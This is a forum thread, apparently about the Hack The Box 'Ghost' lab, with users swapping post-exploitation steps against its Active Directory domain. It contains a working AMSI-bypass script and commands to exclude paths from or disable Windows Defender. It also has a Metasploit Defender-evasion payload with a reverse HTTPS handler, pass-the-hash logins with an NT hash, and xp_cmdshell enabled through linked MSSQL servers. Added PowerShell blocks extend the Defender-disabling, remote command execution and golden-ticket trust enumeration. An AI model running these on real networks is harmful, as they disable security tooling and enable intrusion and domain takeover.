Ghost - Insane
by f4k3h4ck3r - Saturday July 13, 2024 at 03:43 PM
#91
(Jul 15, 2024, 01:56 AM)maggi Wrote:
(Jul 15, 2024, 01:42 AM)osamy7593 Wrote:
(Jul 15, 2024, 01:35 AM)maggi Wrote:
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote: I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote: bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}            # System.Management.Automation.AmsiUtils, matched by suffix so the literal name never appears in the script
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}   # its static amsiContext field (the HAMSICONTEXT handle)
[IntPtr]$c = $b.GetValue($null)                                         # raw pointer to the AMSI context structure
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)            # overwrite its first 4 bytes; AmsiScanBuffer rejects the corrupted header and returns an error, so nothing gets scanned

That exclusion almost got mimikatz working tho...so more potent, I like


Yes, this works too for bypassing AMSI. OK, what did you get?

I have been reading the stuff on cross-forest attacks.... it is not quite clicking yet; well, I don't know if I am messing up the BloodHound analysis or I am plain illiterate, glossing over something in the readings.

Direction              : BiDirectional

Someone told me golden ticket

#92
(Jul 15, 2024, 01:35 AM)maggi Wrote:
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: Guys, any hint after NT AUTHORITY with evil-winrm?

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: Guys, any hint after NT AUTHORITY with evil-winrm?

I started running powerview but the av is whinging about everything else

With NT AUTHORITY rights you can disable the AV using the PowerShell command.

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}            # System.Management.Automation.AmsiUtils, matched by suffix so the literal name never appears in the script
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}   # its static amsiContext field (the HAMSICONTEXT handle)
[IntPtr]$c = $b.GetValue($null)                                         # raw pointer to the AMSI context structure
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)            # overwrite its first 4 bytes; AmsiScanBuffer rejects the corrupted header and returns an error, so nothing gets scanned

That exclusion almost got mimikatz working tho...so more potent, I like


With NT AUTHORITY rights you can disable real-time A/V monitoring using the PowerShell command. This will help you with downloading and using Mimikatz and other tools.

Set-MpPreference -DisableRealtimeMonitoring $true
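The posts above run Set-MpPreference and assume it worked. The following is an added example (not code from the thread) that makes the same changes but verifies them and shows what the defender-side log records; the exclusion target path is the one quoted above and is an assumption, and it has to run as local admin or SYSTEM on the box.

```powershell
# Added example, not from the thread: apply the Defender changes suggested above, then
# verify them instead of assuming, and look at what the Defender operational log recorded.
$target = 'C:\Users\Administrator\AppData\Local\Temp\powerview.ps1'   # assumed path from the thread

# 1. Baseline. If IsTamperProtected is True, Set-MpPreference -DisableRealtimeMonitoring
#    is silently ignored: the cmdlet returns without error, but real-time protection stays on.
$before = Get-MpComputerStatus
"Tamper protection: {0}   Real-time protection: {1}" -f $before.IsTamperProtected, $before.RealTimeProtectionEnabled

# 2. The changes from the thread. Note that Set-MpPreference -ExclusionPath REPLACES the
#    whole exclusion list; Add-MpPreference appends to it, which is what you usually want.
Add-MpPreference -ExclusionPath $target
Set-MpPreference -DisableRealtimeMonitoring $true

# 3. Verify. This is the step the thread skips.
$after = Get-MpComputerStatus
$prefs = Get-MpPreference
if ($after.RealTimeProtectionEnabled) {
    Write-Warning 'Real-time protection is still enabled (tamper protection or policy overrode the change).'
}
if ($prefs.ExclusionPath -notcontains $target) {
    Write-Warning 'Exclusion was not applied.'
}

# 4. What the blue team sees: every preference change lands in the Defender operational log.
#    5007 = configuration changed, 5004 = real-time protection config changed,
#    5001 = real-time protection disabled. The new exclusion path is printed in the 5007 message.
Get-WinEvent -FilterHashtable @{
    LogName = 'Microsoft-Windows-Windows Defender/Operational'
    Id      = 5001, 5004, 5007
} -MaxEvents 10 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } } |
    Format-Table -AutoSize
```

Step 4 is the caveat: adding an exclusion or turning off real-time monitoring is quieter than tripping a signature, but it is not silent, and those three event IDs are exactly what a SIEM rule for Defender tampering keys on.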
#93
(Jul 15, 2024, 02:57 AM)bmoon10 Wrote:
(Jul 15, 2024, 01:35 AM)maggi Wrote:
(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote:
(Jul 15, 2024, 12:57 AM)osamy7593 Wrote: Guys, any hint after NT AUTHORITY with evil-winrm?

I started running powerview but the av is whinging about everything else

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get

(Jul 15, 2024, 01:16 AM)osamy7593 Wrote:
(Jul 15, 2024, 12:59 AM)maggi Wrote: I started running powerview but the av is whinging about everything else

With NT AUTHORITY rights you can disable the AV using the PowerShell command.

bro add exclusion path 

powershell Set-MpPreference -ExclusionPath ../.../../../powerview

after that run it .. tell me what u get
powershell Set-MpPreference -ExclusionPath "C:\Users\Administrator\AppData\Local\Temp\powerview.ps1"

i was using this to load powerview 

$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}            # System.Management.Automation.AmsiUtils, matched by suffix so the literal name never appears in the script
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}   # its static amsiContext field (the HAMSICONTEXT handle)
[IntPtr]$c = $b.GetValue($null)                                         # raw pointer to the AMSI context structure
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)            # overwrite its first 4 bytes; AmsiScanBuffer rejects the corrupted header and returns an error, so nothing gets scanned

That exclusion almost got mimikatz working tho...so more potent, I like


With NT AUTHORITY rights you can disable real-time A/V monitoring using the PowerShell command. This will help you with downloading and using Mimikatz and other tools.

Set-MpPreference -DisableRealtimeMonitoring $true

I can't get mimi to run, it hangs with a #, but I can now get msf to run.

Take it back: spawned a fresh shell with nc and mimi loads.... Facepalm for not trying that a while ago, but idk if that's the way.....
#94
It's weird, even the user flag hasn't shown up yet.
Not sure what to do next after getting Administrator on primary.corp.ghost.htb; tried DCSync, golden ticket, silver ticket. The user should be in the Domain Admins group already, what else to do?
#95
(Jul 15, 2024, 12:43 AM)jimmyshoemacher Wrote: I'm stuck on NT AUTHORITY in PRIMARY.

Does anyone know where to go from here?

I can't run mimikatz; tried to obfuscate it, doesn't work.

I have tried many meterpreter shells; those all get blocked.

I have a shell as NT AUTHORITY but no clue what to do at this point.

You can evade AV using the meterpreter Windows Defender evasion method:
msf> use evasion/windows/windows_defender_exe
msf6 evasion(windows/windows_defender_exe) > set payload windows/x64/meterpreter/reverse_https
msf6 evasion(windows/windows_defender_exe) > set lport 5555
msf6 evasion(windows/windows_defender_exe) > set lhost tun0
msf6 evasion(windows/windows_defender_exe) > run

[*] Compiled executable size: 4608
[+] cop.exe stored at /home/kali/.msf4/local/cop.exe

Transfer cop.exe to the target Windows box.

msf6 evasion(windows/windows_defender_exe) > handler -p windows/x64/meterpreter/reverse_https -H 0.0.0.0 -P 5555

Execute cop.exe on the target Windows box to get the meterpreter session.
#96
(Jul 14, 2024, 08:40 PM)jimmyshoemacher Wrote:
(Jul 14, 2024, 07:41 PM)mmkz Wrote: Primary...
└─$ proxychains4 -q crackmapexec smb 10.0.0.10 -u 'Administrator' -H '41515af3ada195029708a53d941ab751'
SMB        10.0.0.10      445    PRIMARY         
[*]Windows Server 2022 Build 20348 x64 (name:PRIMARY) (domain:corp.ghost.htb) (signing:True) (SMBv1:False)
SMB        10.0.0.10      445    PRIMARY          [+] corp.ghost.htb\Administrator:41515af3ada195029708a53d941ab751 (Pwn3d!)

└─$ proxychains4 -q evil-winrm -i 10.0.0.10 -u 'Administrator' -H '41515af3ada195029708a53d941ab751'

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
ghost-corp\administrator

Bloodhound...
[PRIMARY] --- Trusted by ---> [DC]
 
What's next?


I keep getting a connection refused when trying to connect with evil-winrm, what am I doing wrong? Using 10.0.0.10; what do I put in the hosts file?

Use ligolo-ng, I did struggle with it too.
#97
If someone is stuck with MSSQL, two things were missed in the thread:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > RECONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"
#98
(Jul 15, 2024, 07:40 AM)wh1t3_r4bb1t Wrote: If someone is stuck with MSSQL, two things were missed in the thread:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > RECONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"

In the impacket-mssqlclient utility, after the 'exec_as_login sa' step, use the enable_xp_cmdshell command; it executes the same 4 lines (EXEC sp_configure, RECONFIGURE, etc.).
#99
(Jul 15, 2024, 08:32 AM)bmoon10 Wrote:
(Jul 15, 2024, 07:40 AM)wh1t3_r4bb1t Wrote: If someone is stuck with MSSQL, two things were missed in the thread:
SQL > enum_links
SQL > use_link [PRIMARY]
SQL > use master
SQL > exec_as_login sa
SQL > EXEC sp_configure 'show advanced options', 1
SQL > RECONFIGURE
SQL > EXEC sp_configure 'xp_cmdshell', 1
SQL > RECONFIGURE
SQL > xp_cmdshell "whoami"

In the impacket-mssqlclient utility, after the 'exec_as_login sa' step, use the enable_xp_cmdshell command; it executes the same 4 lines (EXEC sp_configure, RECONFIGURE, etc.).

No, I was getting a "let administrator enable xp_cmdshell" message after it, so I needed to enable it manually.
UPD: oh, you mean "enable_xp_cmdshell", got it.
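For anyone who wants to see what the impacket-mssqlclient helpers in the three posts above (enum_links, use_link, exec_as_login, enable_xp_cmdshell) actually send, here is the underlying T-SQL driven from PowerShell with System.Data.SqlClient. This is an added example and not code from the thread or from impacket: the mapping to T-SQL is my rendering of those helpers, and the SQL host and the low-privilege login are assumptions; PRIMARY is the link name from the thread.

```powershell
# Added example, not from the thread: the T-SQL behind use_link / exec_as_login /
# enable_xp_cmdshell, run over a linked server. Host and login are assumptions.
$server = '10.0.0.20'            # assumed: the SQL host you already have a login on
$cred   = Get-Credential         # assumed: the low-privilege SQL login from earlier in the chain
$link   = 'PRIMARY'              # linked-server name from the thread

$cs = "Server=$server;Database=master;User Id=$($cred.UserName);" +
      "Password=$($cred.GetNetworkCredential().Password);TrustServerCertificate=True"
$conn = New-Object System.Data.SqlClient.SqlConnection $cs
$conn.Open()

function Invoke-Sql([string]$Query) {
    # Runs one batch and returns the LAST result set as a DataTable
    # (sp_configure/RECONFIGURE return none, so xp_cmdshell output is what comes back).
    $cmd = $conn.CreateCommand(); $cmd.CommandText = $Query
    $da  = New-Object System.Data.SqlClient.SqlDataAdapter $cmd
    $dt  = New-Object System.Data.DataTable; [void]$da.Fill($dt); $dt
}

# 1. enum_links: the links are rows in sys.servers. is_rpc_out_enabled must be 1, otherwise
#    every EXEC (...) AT [link] below fails with "Server 'PRIMARY' is not configured for RPC".
Invoke-Sql "SELECT name, product, provider, is_rpc_out_enabled FROM sys.servers" | Format-Table -AutoSize

# 2. use_link PRIMARY + exec_as_login sa + enable_xp_cmdshell + xp_cmdshell whoami.
#    Everything is wrapped in EXEC (...) AT [link] so it executes on the remote instance.
#    The impersonation and the sp_configure calls are kept in ONE batch so the sp_configure
#    calls are guaranteed to run under the sa context regardless of how the linked
#    connection handles session state between separate calls.
$remote = @"
EXECUTE AS LOGIN = 'sa';
EXEC master.dbo.sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC master.dbo.sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC master.dbo.xp_cmdshell 'whoami';
"@
$remote = $remote -replace "'", "''"     # the batch becomes a string literal inside EXEC (...), so double the quotes
Invoke-Sql "EXEC ('$remote') AT [$link]" | Format-Table -AutoSize

$conn.Close()
```

Two things the thread's one-liners hide: EXECUTE AS LOGIN = 'sa' only succeeds if the login the link maps to holds IMPERSONATE on sa (or is sysadmin already), and the whole thing hinges on the link having RPC Out enabled, which is the first thing to read off sys.servers before trying anything else.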
(Jul 15, 2024, 10:01 AM)spamdegratis5 Wrote: I've got a hint for two different approaches, I haven't managed to exploit them, but I'll leave them here for someone smarter than me:
- In order to forge the golden ticket, the aes256 key must be used, the nt hash won't work
- Unconstrained delegation

I don't have more info, only that.


With mimikatz a golden ticket can be obtained using the ghost$ RC4 hash and the corp.ghost.htb and ghost.htb SIDs.
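Both the "cross-forest attacks not clicking" post (#91, with its Direction : BiDirectional output) and the last post about the corp.ghost.htb and ghost.htb SIDs depend on three facts about the trust that are worth confirming before forging anything: which way the trust runs, whether SID filtering is on, and what the two domain SIDs are. The following is an added example, not code from the thread, that gathers them with plain .NET from the evil-winrm shell (no PowerView, no AD module). It assumes corp.ghost.htb is a child domain of ghost.htb, as the names suggest; it contains no hashes and forges nothing.

```powershell
# Added example, not from the thread: enumerate the trust facts a child->parent ticket with
# extra SIDs relies on. Assumes the current domain is a child of the forest root.
Add-Type -AssemblyName System.DirectoryServices

function Get-DomainSidString([string]$DomainDns) {
    # Read objectSid from the domain head object over LDAP and render it as S-1-5-21-...
    $sidBytes = ([ADSI]"LDAP://$DomainDns").objectSid.Value
    (New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)).Value
}

$child  = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()   # e.g. corp.ghost.htb
$parent = $child.Parent                                                            # e.g. ghost.htb
if (-not $parent) {
    throw "$($child.Name) is not a child domain; the extra-SID trick assumes a parent/child trust."
}

# 1. Direction and type. A bidirectional parent/child trust is what "BiDirectional" in the
#    PowerView output earlier in the thread refers to.
$child.GetAllTrustRelationships() |
    Select-Object SourceName, TargetName, TrustDirection, TrustType | Format-Table -AutoSize

# 2. SID filtering. When it is enabled (quarantined), SIDs outside the trusted domain's own
#    range are stripped from the ticket and the extra SID is ignored. Intra-forest
#    parent/child trusts are not quarantined by default, which is why the trick works there.
"SID filtering towards {0}: {1}" -f $parent.Name, $child.GetSidFilteringStatus($parent.Name)

# 3. The two SIDs the post above refers to: the child's own domain SID (the ticket's realm)
#    and the forest root's SID with RID 519 (Enterprise Admins) appended as the extra SID.
$childSid  = Get-DomainSidString $child.Name
$parentSid = Get-DomainSidString $parent.Name
"child domain SID      : $childSid"
"extra SID (root EA)   : $parentSid-519"
```

If GetSidFilteringStatus comes back True, or the trust turns out to be a forest trust rather than parent/child, the extra-SID approach is the wrong tool and the earlier hints in the thread (unconstrained delegation, the AES key) are the ones to revisit.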

